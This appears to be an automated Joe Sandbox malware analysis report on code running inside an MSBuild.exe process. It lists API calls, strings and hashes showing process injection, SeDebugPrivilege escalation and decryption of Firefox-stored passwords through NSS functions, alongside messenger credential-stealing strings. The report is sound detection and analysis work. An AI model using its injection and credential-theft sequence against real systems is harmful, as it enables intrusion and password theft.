Part of subcall function 004176F4: memcmp.MSVCRT(?,0044F118,00000008), ref: 004177B6

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770

Strings

recovered %d pages from %s, xrefs: 004188B4

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
String ID: recovered %d pages from %s
API String ID: 985450955-1623757624
Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58

Function 004021FF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

APIs

_ultoa.MSVCRT ref: 00402264
sprintf.MSVCRT ref: 004022D8

Strings

%s %s %s, xrefs: 004022D2

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: _ultoasprintf
String ID: %s %s %s
API String ID: 432394123-3850900253
Opcode ID: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
Opcode Fuzzy Hash: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E

Function 00409901 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00409919
SendMessageA.USER32(N\@,00001019,00000000,?), ref: 00409948

Strings

N\@, xrefs: 0040993E

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: MessageSendmemset
String ID: N\@
API String ID: 568519121-3851889168
Opcode ID: 2010a019ef781dd6939f17f8e62f95d5074ac9a6fd296138cb71cbff55b3af76
Instruction ID: 8500237f8b168207f1c9a25e89cff2ec53edf3448a21c69821c5a9264d9502ca
Opcode Fuzzy Hash: 2010a019ef781dd6939f17f8e62f95d5074ac9a6fd296138cb71cbff55b3af76
Instruction Fuzzy Hash: 3C016279800205AADB209F59C845AEBB7F8FF85B45F00802DE894B6241D374A945CB79

Function 00409070 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21windowCOMMON

Download Yara Rule

APIs

LoadMenuA.USER32(00000000), ref: 00409078
sprintf.MSVCRT ref: 0040909B

Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B

Strings

menu_%d, xrefs: 00409091

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
String ID: menu_%d
API String ID: 1129539653-2417748251
Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE

Function 004116E1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 004116EA
_msize.MSVCRT ref: 004116FF

Strings

failed memory resize %u to %u bytes, xrefs: 00411706

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: _msizerealloc
String ID: failed memory resize %u to %u bytes
API String ID: 2713192863-2134078882
Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389

Function 004097FF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104), ref: 00406FA1

strrchr.MSVCRT ref: 00409808
_mbscat.MSVCRT ref: 0040981D

Strings

_lng.ini, xrefs: 00409817

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: FileModuleName_mbscatstrrchr
String ID: _lng.ini
API String ID: 3334749609-1948609170
Opcode ID: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
Instruction ID: 627d3aba04136714d7c1818045af5338c576ea1e6c84acb30438f8bc90b354f8
Opcode Fuzzy Hash: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
Instruction Fuzzy Hash: 73C080019497D018F12235212D03F4F06884F83709F34005FF801796C3EF9CA611407F

Function 004070E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14COMMON

Download Yara Rule

APIs

_mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB

Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D

_mbscat.MSVCRT ref: 004070FA

Strings

sqlite3.dll, xrefs: 004070E3

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: _mbscat$_mbscpystrlen
String ID: sqlite3.dll
API String ID: 1983510840-1155512374
Opcode ID: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
Opcode Fuzzy Hash: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB

Function 004033B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8COMMON

Download Yara Rule

APIs

GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8

Strings

A4@, xrefs: 004033B6
Server Details, xrefs: 004033C3

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: PrivateProfileString
String ID: A4@$Server Details
API String ID: 1096422788-4071850762
Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17

Function 0042C821 Relevance: 5.2, APIs: 4, Instructions: 185COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,0000201C), ref: 0042C8E0
memcpy.MSVCRT(?,?,?), ref: 0042C917
memset.MSVCRT ref: 0042C932
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0042C96E

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: memcpy$memset
String ID:
API String ID: 438689982-0
Opcode ID: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
Instruction ID: 02088d5bd302ba8124152156f4c24fba1fa2279ed4138068a4a2dd0dfc44ef6b
Opcode Fuzzy Hash: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
Instruction Fuzzy Hash: BC61BDB2604712AFD710DF65E8C1B2BB7E5FF84304F40892EF99896250D338E955CB9A

Function 0040848B Relevance: 5.1, APIs: 4, Instructions: 104stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 0040849A
memset.MSVCRT ref: 004084D2
memcpy.MSVCRT(?,00000000,?,?,?,?,75A8EB20,?,00000000), ref: 0040858F
LocalFree.KERNEL32(00000000,?,?,?,?,75A8EB20,?,00000000), ref: 004085BA

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: FreeLocalmemcpymemsetstrlen
String ID:
API String ID: 3110682361-0
Opcode ID: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
Opcode Fuzzy Hash: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94

Function 004161CB Relevance: 5.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,00000010), ref: 004161F4
memcpy.MSVCRT(?,?,00000004), ref: 00416218
memcpy.MSVCRT(?,?,00000004), ref: 0041623F
memcpy.MSVCRT(?,?,00000008), ref: 00416265

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8

Function 0040998E Relevance: 5.1, APIs: 4, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1

??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,?,0040402E,00000000,?,0040CD2D), ref: 004099A3
??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D), ref: 004099CC
??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D), ref: 004099ED
??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D), ref: 00409A0E

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: ??2@$memset
String ID:
API String ID: 1860491036-0
Opcode ID: c78329486846fe93a7256add11836ddf78ca18624f4c1b8479d66424083257ec
Instruction ID: ded700a689dc4ea077b1bf28e8ae47d2b9e76a7afd7a7e1dd26f08861e755b16
Opcode Fuzzy Hash: c78329486846fe93a7256add11836ddf78ca18624f4c1b8479d66424083257ec
Instruction Fuzzy Hash: 0B21B6B0A547508EE7558F6A9845A16FAE4FFD0710726C8AFD109DB2B2E7B8D8408F14

Function 0040796E Relevance: 5.1, APIs: 4, Instructions: 63stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 0040797A
free.MSVCRT ref: 0040799A

Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
Part of subcall function 00406F30: memcpy.MSVCRT(00000000,00000000,?,00000000,?,004045BE,00000001,?,?,00000000,00401B21,?), ref: 00406F64
Part of subcall function 00406F30: free.MSVCRT ref: 00406F6D

free.MSVCRT ref: 004079BD
memcpy.MSVCRT(00000001,?,00000000,?,?,?,?,00000000,0044357F,00000000,?,?,00000000,0044386F,?,?), ref: 004079DD

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: free$memcpy$mallocstrlen
String ID:
API String ID: 3669619086-0
Opcode ID: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
Instruction ID: 28856836b01dc1c1490a34e4127c9d88e875caa212a522c6554fbe506b42c8ef
Opcode Fuzzy Hash: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
Instruction Fuzzy Hash: A211CDB1604600EFD720DF18D880E9AB7F5EF48328B108A2EE852A76D1C735F8158B59

Analysis Process: MSBuild.exePID: 600, Parent PID: 7912COMMON

Execution Graph

Execution Coverage:	14.3%
Dynamic/Decrypted Code Coverage:	4.2%
Signature Coverage:	2.7%
Total number of Nodes:	1711
Total number of Limit Nodes:	50

Executed Functions

Function 004049E6 Relevance: 58.0, APIs: 28, Strings: 5, Instructions: 233
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004043E4: memset.MSVCRT ref: 00404406
Part of subcall function 004043E4: GetSystemDirectoryA.KERNEL32(0041E568,00000104), ref: 0040442B
Part of subcall function 004043E4: _mbscpy.MSVCRT(?,0041E568,00000000,00000000,00000000), ref: 0040443E
Part of subcall function 004043E4: memcpy.MSVCRT(?,0041DF00,0000010C,00000000,00000000,00000000), ref: 004044BD

OpenProcess.KERNEL32(001F0FFF,00000000,00000000,00000000,00000000,00000000), ref: 00404A0B
memset.MSVCRT ref: 00404A2F
GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00404A3F

Part of subcall function 00411BA1: GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,00000000,?,?,?,?,?,?,00404A50,?), ref: 00411BC1
Part of subcall function 00411BA1: GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00411BD3
Part of subcall function 00411BA1: GetModuleHandleA.KERNEL32(ntdll.dll,?,?,?,?,?,?,00404A50,?), ref: 00411BE9
Part of subcall function 00411BA1: GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00411BF1
Part of subcall function 00411BA1: strlen.MSVCRT ref: 00411C15
Part of subcall function 00411BA1: strlen.MSVCRT ref: 00411C22

GetProcAddress.KERNEL32(00000000,GetModuleHandleA), ref: 00404A66
GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00404A87
GetProcAddress.KERNEL32(00000000,WriteProcessMemory), ref: 00404AA8
GetProcAddress.KERNEL32(00000000,LocalFree), ref: 00404AC9

Part of subcall function 00411FC6: GetVersionExA.KERNEL32(?,00000000,000000A0), ref: 00411FE0

Part of subcall function 004044DE: GetProcAddress.KERNEL32(00000000,DuplicateToken), ref: 0040451C
Part of subcall function 004044DE: GetProcAddress.KERNEL32(00000000,SetThreadToken), ref: 00404543
Part of subcall function 004044DE: CloseHandle.KERNEL32(?), ref: 00404553
Part of subcall function 004044DE: CloseHandle.KERNEL32(?,00000000,000000A0,000000FF,0000000E,?,?,0040428D), ref: 0040455D
Part of subcall function 004044DE: FreeLibrary.KERNEL32(00000000,000000FF,0000000E,?,?,0040428D), ref: 0040456E

VirtualAllocEx.KERNEL32(00000000,00000000,000000A0,00001000,00000004), ref: 00404AE8
VirtualAllocEx.KERNEL32(00000000,00000000,00000400,00001000,00000040), ref: 00404AF9
VirtualAllocEx.KERNEL32(00000000,00000000,0040428D,00001000,00000004), ref: 00404B0B
VirtualAllocEx.KERNEL32(00000000,00000000,0040428D,00001000,00000004), ref: 00404B1B
WriteProcessMemory.KERNEL32(00000000,00000000,?,0040428D,00000000), ref: 00404B55
WriteProcessMemory.KERNEL32(00000000,?,Function_00004185,00000400,00000000,00000000), ref: 00404B76
WriteProcessMemory.KERNEL32(00000000,0040428D,?,000000A0,00000000), ref: 00404B8C
ResumeThread.KERNEL32(00000000,00000000,00000000,?,0040428D,0040428D), ref: 00404BB5
WaitForSingleObject.KERNEL32(00000000,00003A98), ref: 00404BC1
CloseHandle.KERNEL32(00000000), ref: 00404BC8
memset.MSVCRT ref: 00404BE1
ReadProcessMemory.KERNEL32(00000000,0040428D,?,000000A0,00000000), ref: 00404BFE
??2@YAPAXI@Z.MSVCRT(?), ref: 00404C15
ReadProcessMemory.KERNEL32(00000000,?,00000000,?,00000000), ref: 00404C2B
??3@YAXPAX@Z.MSVCRT(00000000), ref: 00404C43
FreeLibrary.KERNEL32(?), ref: 00404C51
VirtualFreeEx.KERNEL32(00000000,0040428D,00000000,00008000), ref: 00404C6A
VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000), ref: 00404C74
VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000), ref: 00404C7E
VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000), ref: 00404C88
CloseHandle.KERNEL32(00000000), ref: 00404C8D

Strings

GetModuleHandleA, xrefs: 00404A59
LocalFree, xrefs: 00404ABC
GetProcAddress, xrefs: 00404A7A
WriteProcessMemory, xrefs: 00404A9B
kernel32.dll, xrefs: 00404A37

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: AddressProcVirtual$Handle$FreeProcess$Memory$AllocClose$ModuleWritememset$LibraryReadstrlen$??2@??3@DirectoryObjectOpenResumeSingleSystemThreadVersionWait_mbscpymemcpy
String ID: GetModuleHandleA$GetProcAddress$LocalFree$WriteProcessMemory$kernel32.dll
API String ID: 826043887-859290676
Opcode ID: 930746cf2d09351984c2c622d680aac9c04d831a54d7c10d0a04381ceff7e9ec
Instruction ID: 453227f2aabe0250eee1d40a9044243133179be0bc8eed6658bb11275d9bd618
Opcode Fuzzy Hash: 930746cf2d09351984c2c622d680aac9c04d831a54d7c10d0a04381ceff7e9ec
Instruction Fuzzy Hash: CA81F6B1901218BBDF21ABA1CC45EEFBF79EF88754F114066F604A2160D7395A81CFA9

Function 00410DE1 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(00000028,?), ref: 00410DF0

Part of subcall function 00410DAA: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00410DC0

GetLastError.KERNEL32(00000000), ref: 00410E02
GetProcAddress.KERNEL32(?,LookupPrivilegeValueA), ref: 00410E24
LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?,?,LookupPrivilegeValueA,?,?,00000000), ref: 00410E34
GetProcAddress.KERNEL32(?,AdjustTokenPrivileges), ref: 00410E5A
AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000,?,AdjustTokenPrivileges,?,?,00000000), ref: 00410E6B
CloseHandle.KERNELBASE(?,?,?,00000000), ref: 00410E78

Strings

SeDebugPrivilege, xrefs: 00410E2E
LookupPrivilegeValueA, xrefs: 00410E1D
AdjustTokenPrivileges, xrefs: 00410E53

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: AddressProc$AdjustCloseCurrentErrorHandleLastLookupPrivilegePrivilegesProcessTokenValue
String ID: AdjustTokenPrivileges$LookupPrivilegeValueA$SeDebugPrivilege
API String ID: 3328644959-164648368
Opcode ID: bcfb295028deb42d7034a1c1e26edc5f6458782d310d68dd3fa971f052d55e9a
Instruction ID: 180035a187f8386c87a779d0175683d60653c8262eee481a5a772ffe12dd7b09
Opcode Fuzzy Hash: bcfb295028deb42d7034a1c1e26edc5f6458782d310d68dd3fa971f052d55e9a
Instruction Fuzzy Hash: D2117371900205FBDB11ABE5DC85AEF7BBCEB48344F10442AF501E2151DBB99DC18BA9

Function 00407898 Relevance: 6.1, APIs: 4, Instructions: 58filestringCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNELBASE(00000103,00000247,?,?,004042EE,?), ref: 004078AE
FindNextFileA.KERNELBASE(000000FF,00000247,?,?,004042EE,?), ref: 004078CC
strlen.MSVCRT ref: 004078FC
strlen.MSVCRT ref: 00407904

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: FileFindstrlen$FirstNext
String ID:
API String ID: 379999529-0
Opcode ID: 2b827dd507cf4954e4e0e3644904d3df78e65a6b3ddb2711f2897f60a4f4153f
Instruction ID: 3f72f9a190aab30f8f483bccc0fafde7a86c3084d5e1b238a9c8f95d2c3e0c3c
Opcode Fuzzy Hash: 2b827dd507cf4954e4e0e3644904d3df78e65a6b3ddb2711f2897f60a4f4153f
Instruction Fuzzy Hash: 1F1186B2919201AFD3149B34D884EDB77D8DF44325F20493FF19AD21D0EB38B9459755

Function 0040C66A Relevance: 47.4, APIs: 21, Strings: 6, Instructions: 185
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00404D7A: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404D99
Part of subcall function 00404D7A: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404DAB
Part of subcall function 00404D7A: FreeLibrary.KERNEL32(00000000), ref: 00404DBF
Part of subcall function 00404D7A: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404DEA

FreeLibrary.KERNEL32(?), ref: 0040C6A7
EnumResourceTypesA.KERNEL32(00412111,00000000), ref: 0040C6C3
MessageBoxA.USER32(00000000,Failed to load the executable file !,Error,00000030), ref: 0040C6E5

Strings

/deleteregkey, xrefs: 0040C758
f-@, xrefs: 0040C8DA
/savelangfile, xrefs: 0040C72C
Error, xrefs: 0040C6DA
Software\NirSoft\MessenPass, xrefs: 0040C766
Failed to load the executable file !, xrefs: 0040C6DF

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: Library$FreeMessage$AddressEnumLoadProcResourceTypes
String ID: /deleteregkey$/savelangfile$Error$Failed to load the executable file !$Software\NirSoft\MessenPass$f-@
API String ID: 1343656639-3807849023
Opcode ID: bf61469027130118474623f35ae7271cfc36ceaf75fa351a33b2a188a8b5b499
Instruction ID: c9cf7fae9a68988a057e6d0076c0e2abe6ed6f3ff992c821ff985c928f871611
Opcode Fuzzy Hash: bf61469027130118474623f35ae7271cfc36ceaf75fa351a33b2a188a8b5b499
Instruction Fuzzy Hash: 7661917190420AEBDF21AF61DD89ADE3BB8BF84305F10817BF905A21A0DB389945DF5D

Function 00405EC5 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 161
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00405EE7
memset.MSVCRT ref: 00405EFF

Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B

memset.MSVCRT ref: 00405F3A

Part of subcall function 00411DEE: RegEnumKeyExA.ADVAPI32(?,000000FF,000000FF,?,00000000,00000000,00000000,000000FF,000000FF), ref: 00411E11

_mbsnbicmp.MSVCRT ref: 00405F68
memset.MSVCRT ref: 00405F87
memset.MSVCRT ref: 00405FA0
_snprintf.MSVCRT ref: 00405FB9
_mbsrchr.MSVCRT ref: 00405FDE
_mbsicmp.MSVCRT ref: 00406012
_mbscpy.MSVCRT(?,?), ref: 0040602B
_mbscpy.MSVCRT(?,?,?,?), ref: 0040603E
RegCloseKey.ADVAPI32(?), ref: 0040606C
_mbscpy.MSVCRT(?,?), ref: 0040607A
ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Firefox,?,00000104), ref: 0040608C
GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 004060A4

Strings

%s\bin, xrefs: 00405FAC
PathToExe, xrefs: 00405FBF
%programfiles%\Mozilla Firefox, xrefs: 00406087
SOFTWARE\Mozilla, xrefs: 00405F0B
mozilla, xrefs: 00405F62

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: memset$_mbscpy$CloseCurrentDirectoryEnumEnvironmentExpandOpenStrings_mbsicmp_mbsnbicmp_mbsrchr_snprintf
String ID: %programfiles%\Mozilla Firefox$%s\bin$PathToExe$SOFTWARE\Mozilla$mozilla
API String ID: 201549630-2797892316
Opcode ID: 143d9ff20e20033ed1fcd052ac8b55e33d1b5df0c5c94a0e96d74893e0675214
Instruction ID: a9db27f8d3bb6867008f3f8c7ab71477537d255c6bc9b4b6a3b98ebc98dd088a
Opcode Fuzzy Hash: 143d9ff20e20033ed1fcd052ac8b55e33d1b5df0c5c94a0e96d74893e0675214
Instruction Fuzzy Hash: 8F51B7B184015DBADB21DB619C86EDF7BBC9F15304F0004FAB548E2142EA789FC58BA5

Function 00410C4C Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 93
libraryloaderstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00410C6D

Part of subcall function 00405EC5: memset.MSVCRT ref: 00405EE7
Part of subcall function 00405EC5: memset.MSVCRT ref: 00405EFF
Part of subcall function 00405EC5: memset.MSVCRT ref: 00405F3A
Part of subcall function 00405EC5: RegCloseKey.ADVAPI32(?), ref: 0040606C
Part of subcall function 00405EC5: _mbscpy.MSVCRT(?,?), ref: 0040607A
Part of subcall function 00405EC5: ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Firefox,?,00000104), ref: 0040608C
Part of subcall function 00405EC5: GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 004060A4

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00410C92
SetCurrentDirectoryA.KERNEL32(?), ref: 00410C9F
memset.MSVCRT ref: 00410CB4
strlen.MSVCRT ref: 00410CBE
strlen.MSVCRT ref: 00410CCC
LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 00410D0B
GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 00410D23
GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 00410D2F
GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 00410D3B
GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 00410D47
GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 00410D53
GetProcAddress.KERNEL32(?,PK11SDR_Decrypt), ref: 00410D5F

Part of subcall function 00406B4B: _mbscpy.MSVCRT(0040390F,00000000,0040390F,0040D4CE,00000000,Trillian\users\global), ref: 00406B53
Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62

